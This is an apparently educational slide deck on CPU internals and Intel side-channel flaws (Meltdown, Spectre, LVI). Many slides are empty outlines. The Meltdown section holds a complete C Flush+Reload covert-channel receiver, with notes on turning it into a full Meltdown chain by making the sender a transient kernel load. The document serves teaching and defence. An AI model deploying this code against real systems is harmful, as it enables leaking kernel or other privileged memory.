# Load Value Injection
## Shin Li. TrendMicro.inc
<!-- Put the link to this slide here so people can follow -->
slide:https://hackmd.io/@Shinshipower/rylWHu21w
---
## First of All, Why This Slide (and Why It's Still a Work in Progress)
----
Since you finished Computer Organization/Architecture, how long has it been since you last tried to understand how a CPU, or a modern computer, actually works?
----
### The Abacus Book
The common editions of the abacus book (Patterson & Hennessy's *Computer Organization and Design*) use the MIPS architecture as the running example, from a single-cycle datapath up to three- and five-stage pipelines.
Constrained by the length of the curriculum, courses usually cover only the most basic parts.
Yet over the history of CPU development, CPUs have long since changed enormously.
----
#### Black Magic
Because documentation for mainstream CPU architectures such as x86 is mostly incomplete, most learners start from MIPS/ARM/RISC-V instead.
One textbook, nicknamed the "pillar book", uses the Intel architecture as its example, but it too stays at the teaching level.
----
<!-- .slide: data-transition="normal-in zoom-out" -->
#### Don't you want to understand, or hack, the thing you use every day?
----
<!-- .slide: data-transition="zoom" -->
### Celebrating the 100th session of the 若渴 project
----
<!-- .slide: data-transition="zoom" -->
## I actually made the slides ahead of time!
<span>Because there are too many vulnerabilities......<!-- .element: class="fragment" data-fragment-index="1" --></span>
<span>Re-reading one paper and summarizing its key points eats a whole evening<!-- .element: class="fragment" data-fragment-index="2" --></span>
<span>Of course it will<!-- .element: class="fragment" data-fragment-index="3" --></span><span> ~~be late~~<!-- .element: class="fragment" data-fragment-index="4" --></span><span> to be continued<!-- .element: class="fragment" data-fragment-index="5" --></span>
---
## Agenda
- Modern CPU recap
- The black magic inside x86 processors
- Intel Vulnerabilities
- Load Value Injection
---
## Modern CPU
REF : [Modern processor design course notes compiled by Jserv](http://hackfoldr.org/cpu/)
----
### Cache
----
### Branch Prediction
----
### Micro OP
----
### Out-of-Order Execution (OoOE)
----
### Superscalar
----
### Simultaneous multithreading (SMT)
---
## Those Black Magic inside x86 Processor
----
### Co-processor
----
### Predicting Everything
----
### Cache Everywhere
---
## Intel Vulnerabilitie"s" Recall
The dumb things Intel did over the years
----
## Speculative Execution
The starting point of side-channel attacks on modern x86
- Meltdown (couldn't brake in time and ran past the stop)
- Spectre (fooling every kind of predictor)
- Foreshadow
- LazyFP
Interactive tree of transient-execution attacks: https://transient.fail/
ref: https://zhuanlan.zhihu.com/p/32784852
---
### Meltdown
wiki: https://zh.wikipedia.org/zh-tw/%E7%86%94%E6%AF%81_(%E5%AE%89%E5%85%A8%E6%BC%8F%E6%B4%9E)
The root of all evil ~~莉亞布羅~~
Utterly absurd
Up to ~500 KB/s
Read everything in your kernel from user space.
----
#### Meltdown -2
Prerequisites: ~~an Intel processor~~
- Out-of-order execution
  - relies only on straight-line execution past an exception; no branch predictor needed
- An exception (or any ring/permission/kernel/protection change)
  - makes the following instructions execute transiently **before the permission check takes effect**
- A covert channel
  - achieved simply by comparing **load latency**
Fixup: ~~AMD YES~~
- KAISER (KPTI)
  - switch to a separate kernel page table on every user/kernel transition
  - a big hit on performance, back to Pentium 4!
----
#### Meltdown 3
Simple PoC:
```c
raise_exception();                /* architecturally, nothing after this line runs */
access(probe_data[data * 4096]);  /* transiently executed anyway; leaves a cache footprint */
```
1. Either a divide by zero or an access violation triggers the exception, a "status change" in the processor.
2. Before the exception is actually delivered, the **out-of-order execution unit** has already executed line 2 transiently; the privilege check on a kernel-address load is only enforced when the instruction retires, so in the meantime the loaded value is usable by dependent instructions.
The processor eventually cancels line 2 when the exception is taken, rolling back its architectural effects. However, it does not clean up the cache! That makes a super simple covert channel: just time the loads.
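The "just time the loads" step, written out as an added example that is not from the slides: a Flush+Reload receiver over a 256-slot probe array, one page per byte value, exactly the `probe_data[data * 4096]` layout of the PoC. The sender here touches the slot with an ordinary load rather than a transient one, so the file demonstrates only the channel that turns a cache footprint back into a byte, not the fault itself. The slot size, the scrambled scan order and the 150-cycle hit threshold are assumptions for this demo (calibrate the threshold on your own machine); on non-x86 builds the flush and cycle counter are stubbed out and only the decoder is meaningful.

```c
/* Flush+Reload receiver for Meltdown's cache covert channel (added example,
 * not from the slides). Sender touches a slot architecturally; receiver
 * evicts, waits, reloads every slot and picks the fastest. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define SLOTS     256   /* one slot per possible byte value */
#define SLOT_SIZE 4096  /* one page apart, as in probe_data[data * 4096] */

static uint8_t probe[SLOTS * SLOT_SIZE] __attribute__((aligned(4096)));

/* Byte value v is encoded as a touch of probe[v * 4096]. */
size_t probe_offset(uint8_t v) { return (size_t)v * SLOT_SIZE; }

#if defined(__x86_64__) || defined(__i386__)
static inline void fence(void) { __asm__ volatile("mfence" ::: "memory"); }
static inline void flush_line(const void *p) {
    __asm__ volatile("clflush (%0)" :: "r"(p) : "memory");
}
/* Cycles for one load of *p, fenced so the timer brackets only that load. */
static inline uint64_t timed_load(const uint8_t *p) {
    uint32_t lo, hi, aux;
    __asm__ volatile("mfence\n\tlfence\n\trdtsc\n\tlfence" : "=a"(lo), "=d"(hi) :: "memory");
    uint64_t t0 = ((uint64_t)hi << 32) | lo;
    uint8_t v = *(volatile const uint8_t *)p;
    __asm__ volatile("rdtscp" : "=a"(lo), "=d"(hi), "=c"(aux) :: "memory");
    uint64_t t1 = ((uint64_t)hi << 32) | lo;
    __asm__ volatile("" :: "r"(v));   /* keep the load alive */
    (void)aux;
    return t1 - t0;
}
#else
/* Non-x86 fallback so the file still builds: no flush, no cycle counter,
 * so measured latencies are meaningless here; only decode_slot is exercised. */
static inline void fence(void) {}
static inline void flush_line(const void *p) { (void)p; }
static inline uint64_t timed_load(const uint8_t *p) {
    uint8_t v = *(volatile const uint8_t *)p;
    __asm__ volatile("" :: "r"(v));
    return 0;
}
#endif

/* Write every slot once so each page gets its own physical frame instead of
 * the shared zero page (otherwise every slot would hit in cache). */
void probe_init(void) {
    for (int i = 0; i < SLOTS; i++) probe[probe_offset((uint8_t)i)] = 1;
}

/* The sender: in Meltdown this access happens transiently after the faulting
 * kernel load; here it is an ordinary load of the same slot. */
void send_byte(uint8_t v) {
    uint8_t t = *(volatile uint8_t *)(probe + probe_offset(v));
    __asm__ volatile("" :: "r"(t));
}

/* Lowest-latency slot, or -1 if no slot came in under the hit threshold. */
int decode_slot(const uint64_t lat[SLOTS], uint64_t threshold) {
    int best = -1;
    uint64_t best_t = threshold;
    for (int i = 0; i < SLOTS; i++)
        if (lat[i] < best_t) { best_t = lat[i]; best = i; }
    return best;
}

/* One round of the channel: evict, let the sender run, reload every slot. */
int receive_byte(uint8_t secret, uint64_t threshold) {
    uint64_t lat[SLOTS];
    for (int i = 0; i < SLOTS; i++) flush_line(probe + probe_offset((uint8_t)i));
    fence();
    send_byte(secret);
    fence();
    /* Scrambled visiting order (167 is odd, so this is a permutation of
     * 0..255) so the prefetcher does not warm the next slot for us. */
    for (int i = 0; i < SLOTS; i++) {
        int s = (i * 167 + 13) & 0xff;
        lat[s] = timed_load(probe + probe_offset((uint8_t)s));
    }
    return decode_slot(lat, threshold);
}

/* Decoder sanity check on constructed latencies: slot `hot` takes `hit`
 * cycles, every other slot takes `miss` cycles. */
int synthetic_decode(int hot, uint64_t hit, uint64_t miss, uint64_t threshold) {
    uint64_t lat[SLOTS];
    for (int i = 0; i < SLOTS; i++) lat[i] = miss;
    lat[hot & 0xff] = hit;
    return decode_slot(lat, threshold);
}

int main(void) {
    const uint8_t secret = 0x41;   /* constructed "leaked" byte */
    int hits = 0;
    probe_init();
    for (int round = 0; round < 100; round++)
        if (receive_byte(secret, 150) == secret) hits++;
    printf("recovered 0x%02x in %d/100 rounds\n", secret, hits);
    return 0;
}
```

On a real Meltdown chain the only change is in `send_byte`: the touch of `probe[secret * 4096]` is issued by the transient instructions after the faulting kernel load, and the exception is then suppressed or caught; the receiver side is unchanged. If the hit rate is poor, print the raw latency histogram of one round and move the threshold to sit between the cache-hit and cache-miss clusters.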
---
### Spectre
Wiki: https://zh.wikipedia.org/wiki/%E5%B9%BD%E7%81%B5%E6%BC%8F%E6%B4%9E
The cockroach you can't kill ~~the art of historical collective debt~~
Almost every ISA with a speculative execution unit is affected.
Or rather,
any unit that "predicts" can be abused,
so no matter how much you patch, you never finish.
----
#### Spectre 2
----
## Intel Vulnerabilitie"s" Recall-2
- Microarchitectural Data Sampling (MDS)
- ZombieLoad and RIDL
- Fallout
- SWAPGS
- Snoop
----
## Intel Vulnerabilitie"s" Recall-3
- Spoiler
- CrossTalk
- PortSmash
- NetCAT
- And more...
---
## Load Value Injection (LVI)
<!-- Slide title: "Load Value Injection (LVI) and those related to PipeLine". Used for Rock_Project @ NCKU 2020/07/19 -->